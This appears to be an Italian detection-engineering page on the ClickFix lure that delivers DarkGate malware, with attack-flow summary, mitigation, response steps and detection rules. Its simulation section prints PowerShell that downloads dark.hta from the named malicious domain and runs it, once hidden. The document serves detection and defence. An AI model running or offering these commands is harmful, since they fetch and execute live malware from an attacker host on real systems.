Studio di Caso di ClickFix: Malware DarkGate
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il rapporto descrive un metodo di social engineering chiamato ClickFix che persuade gli utenti a copiare ed eseguire un comando PowerShell, il quale quindi scarica un file HTA malevolo. Questo file HTA, a sua volta, scarica componenti aggiuntivi, incluso uno script AutoIt che crea directory, rilascia file e stabilisce comunicazioni C2. L’attività è attribuita alla campagna DarkGate e si basa su un’offuscazione base64 oltre a una manomissione degli appunti per evitare un rilevamento diretto.
Indagine
Gli analisti hanno svelato diversi strati di contenuto codificato in base64 incorporato in una falsa pagina di allerta per estensioni del browser e hanno recuperato il comando PowerShell responsabile del recupero di dark.hta da linktoxic34.com. Quando eseguito, l’HTA distribuisce un eseguibile AutoIt (fckhffh.a3x) che esegue una routine DES e avvia ulteriori payload. La telemetria di rete catturata mostra traffico HTTP(S) verso il dominio malevolo, seguito dall’esecuzione concatenata di script PowerShell.
Mitigazione
Le difese raccomandate includono la formazione degli utenti per scoraggiare la copia di frammenti di codice sconosciuti, la disabilitazione della finestra di dialogo Esegui di Windows tramite Criteri di Gruppo e il dispiegamento di soluzioni antivirus basate sul comportamento. Bloccare proattivamente il dominio malevolo e monitorare esecuzioni anomale di PowerShell può ridurre significativamente il rischio di infezione da DarkGate.
Risposta
Se viene identificato un evento correlato a ClickFix, isolare il punto terminale coinvolto, fermare tutti i processi malevoli, rimuovere gli artefatti HTA e AutoIt, e eseguire un’analisi forense su eventuali cartelle create durante l’intrusione. Aggiornare la logica di rilevamento per individuare modelli di esecuzione PowerShell e HTA sospetti ed assicurarsi che il dominio associato sia bloccato in tutto l’ambiente.
Flusso di Attacco
Rilevamenti
Comportamento di Evasione Rilevato della Difesa MSHTA Sospetto con Comandi Associati (via process_creation)
Vedi
Stringhe PowerShell Sospette (via powershell)
Vedi
Eseguibile AutoIT è stato Eseguito da Posizione Insolita (via process_creation)
Vedi
File Sospetti nel Profilo Utente Pubblico (via file_event)
Vedi
Esecuzione Sospetta dal Profilo Utente Pubblico (via process_creation)
Vedi
Chiamata di Metodi .NET Sospetti da PowerShell (via powershell)
Vedi
IOC (HashSha256) per rilevare: ClickFix: DarkGate
Vedi
Rilevamento di Attività PowerShell Malevola per Download di File HTA [Connessione di Rete Windows]
Vedi
Attività PowerShell Malevola Coinvolgente Esecuzione HTA e Manipolazione degli Appunti [PowerShell di Windows]
Vedi
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-Voluto della Telemetria e Baseline deve essere superato.
Motivo: Questa sezione delinea l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa di Attacco & Comandi:
Un attaccante che ha ottenuto l’accesso con pochi privilegi su un host Windows compromesso desidera scaricare un payload HTA malevolo utilizzato nella campagna ClickFix. Per rimanere nascosto, l’attaccante utilizza PowerShell—uno strumento nativo di Windows—quindi non vengono introdotti binari esterni. Il comando viene eseguito direttamente nella console (o tramite un’attività pianificata) e include l’URL esatto che la regola osserva. Il download è archiviato nella directory%TEMP%dell’utente e poi eseguito tramiteStart-Process.$url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $out = "$env:TEMPdark.hta" Invoke-WebRequest -Uri $url -OutFile $out Start-Process -FilePath $out -
Script di Test Regressione: (autocontenuto, riproduce i passaggi sopra)
# Simulazione download ClickFix HTA – attiva la regola Sigma $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $destPath = "$env:TEMPdark.hta" try { Write-Host "[*] Scaricamento payload HTA malevolo..." Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing Write-Host "[+] Scaricamento completo. Esecuzione del payload..." Start-Process -FilePath $destPath -WindowStyle Hidden } catch { Write-Error "Download o esecuzione falliti: $_" } -
Comandi di Pulizia: (rimuove l’HTA scaricato e qualsiasi istanza in esecuzione)
# Rimuovere il file HTA e terminare qualsiasi processo residuo $htaPath = "$env:TEMPdark.hta" if (Test-Path $htaPath) { Remove-Item $htaPath -Force Write-Host "[*] File HTA rimosso." } # Eliminare qualsiasi processo che potrebbe essere stato lanciato dall'HTA (esempio generico) Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force